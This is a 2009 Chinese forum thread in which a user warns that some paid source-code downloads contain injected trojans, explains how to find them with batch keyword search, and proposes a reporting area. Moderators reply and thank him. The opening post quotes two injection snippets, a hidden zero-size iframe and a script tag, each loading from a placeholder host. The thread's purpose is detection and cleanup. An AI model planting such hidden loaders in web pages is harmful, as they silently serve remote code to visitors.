源码论坛新源代

立即加入

QQ登录

只需一步,快速开始

香港云VPS只要28/月新源代香港VPS 站长建站必备文字广告30/月 Q 380559645

[建议申诉] 部分收费的有挂马现象,解析网页后门和挂马

monkey_cici 发表于 2009-8-17 17:56:06 | 显示全部楼层 |阅读模式

马上注册,下载更多源码!

您需要 登录 才可以下载或查看,没有账号?立即加入

x
iframe语句
<iframe src=http://www.xxx.com/xxx.html width=0 height=0></iframe>

<script language=javascript src=http://www.xxx.com/xxxx.js></script>
JS套用的麻烦  还要查JS文件  不过有些JS里面的网站是“加密”的
还要查找加密关键字

每次都要使用批量替换查找软件  类似使用EmEditor

网站流量统计
CNZZ 51LA等等
每次查找cnzz.com 51.la等等的关键字  然后进行替换

我想大部分的人 都下载自己测试改动  不然不会来这里

我想作者们发布的时候 不止是“已测” 还要增加“安全”之类的
当然这样就麻烦作者们了
有利有弊 不好说

应该再增加个举报区  举报人当然是要有一点好处的
然后管理员 在那个帖子改动一下
增加红字“有网友反映 XXX处 有木马 大家注意清除”
这样网站管理员负担不会重

评分

记忆碎片 + 30 + 30 + 30 新源代需要动力,我们是一家人.

幸福的小K 发表于 2009-8-17 18:46:11 | 显示全部楼层
做论坛不容易....再细化下去需要人力.不过我也很赞同楼主的建议.
    郁闷

连续签到: 1 天

2000klw 发表于 2009-8-17 19:10:35 | 显示全部楼层

只要有看到举报的我们都会跟据实际情况进行相应的处理!谢谢楼主的热心建议!也希望发现问题请第一时间进行举报!再开一个举报区就没有必要了,每个贴子下面都有“报告”功能的,只要是我处理的都会有奖励哦!

连续签到: 1 天

记忆碎片 发表于 2009-8-17 19:28:24 | 显示全部楼层
    好的建议帖子.我都加高分.楼主是一个心细的人.就目前来说,人力还不是很充足.不过楼主的建议会在后期慢慢完善的.支持一下.

henry168 发表于 2009-11-9 16:03:59 | 显示全部楼层
    帮顶
    !!!!!!!!!!!!!!!!!!!!!!